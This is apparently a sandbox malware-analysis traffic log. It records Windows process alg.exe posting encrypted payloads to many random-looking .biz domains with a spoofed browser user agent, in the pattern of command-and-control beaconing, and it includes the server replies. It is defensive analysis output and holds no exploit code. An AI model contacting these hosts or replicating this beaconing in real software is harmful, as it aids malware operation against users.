                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:40.943341970 CET778OUTData Raw: 93 a1 c2 f1 60 12 2e b0 fe 02 00 00 11 c1 0c c1 f0 b0 8a 38 df 22 d0 7f 92 39 4d cd 53 e8 b2 25 7f 97 62 ef 39 4a 8f 58 e3 23 1a d3 24 69 41 0d b1 56 ed 50 bf 27 1a 40 03 cb a2 b9 59 be 65 e1 6b 94 fb 07 4e e0 aa 53 80 a3 d7 26 1f db 38 74 94 11
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: `.8"9MS%b9JX#$iAVP'@YekNS&8t`%q2j~YOf5m6$m]wC!fEErO%K_[YVT}l.sU1?\daGB}&jbK2]o'M
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:41.605125904 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=9466017915a26b373df97f502562bacd|155.94.241.187|1731920261|1731920261|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      41192.168.2.75002082.112.184.19780
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:41.563838005 CET351OUTPOST /lxkilbbex HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:41.563853979 CET842OUTData Raw: 18 0b 0b 37 1d 57 56 05 3e 03 00 00 81 40 37 69 25 70 02 1b 37 1c 1a 96 2d cc c0 33 df 03 97 fe 8a c7 83 a8 6c c0 31 2d 33 b5 f1 85 26 be ca ce 9c 7e 91 b5 4b 9b ac ed e4 26 6e ae b6 19 40 0b 21 27 7a f0 aa ac 1f 2c d5 92 79 e7 f7 80 8c 44 2e c4
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 7WV>@7i%p7-3l1-3&~K&n@!'z,yD.<Z^']xK;7[BLv1|-vw>#BLr>2Ij5'Z ?4~+~WLRp}sCg7~"N&S<>HC3_


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      42192.168.2.750021208.100.26.245805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:42.509325981 CET354OUTPOST /xtwpytxmpg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:42.509342909 CET778OUTData Raw: 48 4d 93 74 a3 cc a0 ec fe 02 00 00 10 f1 bb e4 1a 64 8b 36 9b ae bd e7 4e 08 f6 b6 d5 83 54 f9 fe 54 cf 55 52 18 27 66 5c 1a 0d 07 85 24 dd 23 f8 3a 78 2f e3 c4 69 25 13 43 23 79 ef 24 df 41 2c ac 0e 22 20 8a c1 bf dc 09 5f 54 0c ef 06 b2 26 ee
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: HMtd6NTTUR'f\$#:x/i%C#y$A," _T&9:9X*?!2`*pU,hp"{&<}kN=77 -=.sae5"YK/o)po66u4H9QQ},sp2Y74
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.149945974 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.455840111 CET353OUTPOST /vxagkgmfv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.455874920 CET778OUTData Raw: bc 53 1c c5 b1 64 56 0a fe 02 00 00 61 3f a9 fc 6a 79 85 5c fb 5a ca f9 70 9a ee 22 97 47 24 d4 94 a2 54 db 4a 09 11 1b b4 62 03 ee 11 b5 4c b7 a8 9c 7a 03 ed 9d 72 0d e2 b9 65 4f 4c 0a 97 4e 98 cb 63 2c a5 64 6d ad 1f 55 54 86 bd a3 7f 2e b7 33
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: SdVa?jy\Zp"G$TJbLzreOLNc,dmUT.3,$P@bVZr&cW\$}9bFg[uKO6RfOp_Okcb=hP=exh)IIK}Lp6M^/:2nkHMShAv'
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.600764990 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      43192.168.2.75002213.251.16.150805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.781769991 CET357OUTPOST /hyoldlagxghmkub HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.781784058 CET778OUTData Raw: 36 20 f1 c3 ad 3e 4b d2 fe 02 00 00 f0 4f 5f 86 e4 32 90 96 fb 36 67 57 fe 1c 23 c9 98 78 37 67 ee a8 10 86 6a 60 41 a7 af 89 9c 8f fc 75 45 fe a6 ac db 9a 05 87 75 bd 1f f5 a1 0d a4 dd 0f 06 94 e8 69 f2 af 9e da 40 37 d8 8f c5 b2 a0 1e fe 48 69
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 6 >KO_26gW#x7gj`AuEui@7Hi-E/U[yH~ZScG^WI^Y~p&ai<U/Mf|#KcYV,`d/{4TYAk=&${#f-P3j{q"m
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:45.228607893 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=31cb914ee96879f0acd321fec8ea2199|155.94.241.187|1731920264|1731920264|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      44192.168.2.75002344.221.84.105805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:45.471549988 CET355OUTPOST /iipwcgamik HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:45.471673012 CET778OUTData Raw: 07 d9 67 1c 8c 82 fd e3 fe 02 00 00 f1 48 37 e3 61 4e 01 c6 cb 63 7f 87 51 be 66 34 82 16 67 ca 5a 39 49 b7 e7 8f 9d 52 f0 17 60 b4 85 b3 c5 fa 96 a3 4b 99 0b 30 ad da 60 5f 8a b3 c2 c7 39 43 66 f0 66 f2 db 24 6a f2 04 81 3f 3b 25 1d 82 c0 97 8e
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: gH7aNcQf4gZ9IR`K0`_9Cff$j?;%@`}II\y>wT5~O}:TZg]Ny2y@kfdZS?I\?~<jJxYl }n(oy77q
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:46.147136927 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=76fd90e3429cfb50a8b859d359898e1e|155.94.241.187|1731920266|1731920266|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      45192.168.2.75002454.244.188.177805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:46.355870962 CET349OUTPOST /xubhw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:46.355895996 CET778OUTData Raw: 78 fb 2a a3 96 57 38 58 fe 02 00 00 c5 e5 2a 1a 11 14 6b 28 38 11 de 4f a2 9d dd 8e 24 f8 6f de 9f a8 c4 23 20 3c b8 8a 05 95 35 09 b9 80 21 a0 6e 7e cc 2e 64 4c 93 23 5c 30 59 d4 44 ea f6 a3 1e 39 39 70 f0 35 a9 91 4e a7 58 73 1d d7 b4 2c fb 90
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: x*W8X*k(8O$o# <5!n~.dL#\0YD99p5NXs,t[?9)aPp^>s`vtkZ*WXF3K%&IAZv$nG]R,DS[JAyrvQ"JP^(i9MHP:D0;ej%I!:ta
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.184914112 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=2c256c25e1ea79705aba050f4748446e|155.94.241.187|1731920267|1731920267|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      46192.168.2.75002535.164.78.200805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.667769909 CET345OUTPOST /mvx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.667795897 CET778OUTData Raw: 1d 98 31 7e be 35 1d b2 fe 02 00 00 c4 52 4a 8f ae c4 17 0a c2 d5 6a 13 f7 f0 b7 e5 2d 5f bd ab ae 4e a8 b9 fa e3 fe 39 77 8d 83 2f 43 c6 33 ed e5 82 ed 35 00 be 9d db 68 09 1b 9e f9 ef 16 07 a1 24 59 f9 84 62 1c fa 58 e6 59 4a 06 f2 e7 55 3c 76
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 1~5RJj-_N9w/C35h$YbXYJU<vh/0zq[i1L;r\=2Q2Os^kSB?IL[(Q=HfrPHPBG[p]bPIFnx0)+T(Kk~c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.490973949 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=575ce9ee2e219b19863d295a96ae1e1c|155.94.241.187|1731920268|1731920268|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      47192.168.2.7500263.94.10.34805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.655607939 CET359OUTPOST /fmngqrfquhhkif HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.655630112 CET778OUTData Raw: 5c 8b f7 39 97 ff 6e 9e fe 02 00 00 66 fb 53 f7 bb a4 a9 44 b9 c1 f8 21 8b 34 fd 2d e3 47 8a b6 42 de 33 1d 52 08 40 29 bf 01 ed 21 1c 0d d7 36 cc b4 c8 62 1a 25 fb 2a 9f e5 4c 3c b3 da c1 47 13 81 55 6f 97 19 85 ca 50 75 f5 ed 63 ed 85 5f 20 a1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: \9nfSD!4-GB3R@)!6b%*L<GUoPuc_ XOi#3hWUv>eH|xO+!uSAfdCM~aL#;82f)1=^h#K;k5ct;+c2?fJL^I;z
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.302148104 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=3eee62bd42e55fbce50d6342208b893e|155.94.241.187|1731920269|1731920269|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      48192.168.2.750027165.160.13.20805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.598207951 CET356OUTPOST /vblbtbbfmivxyja HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
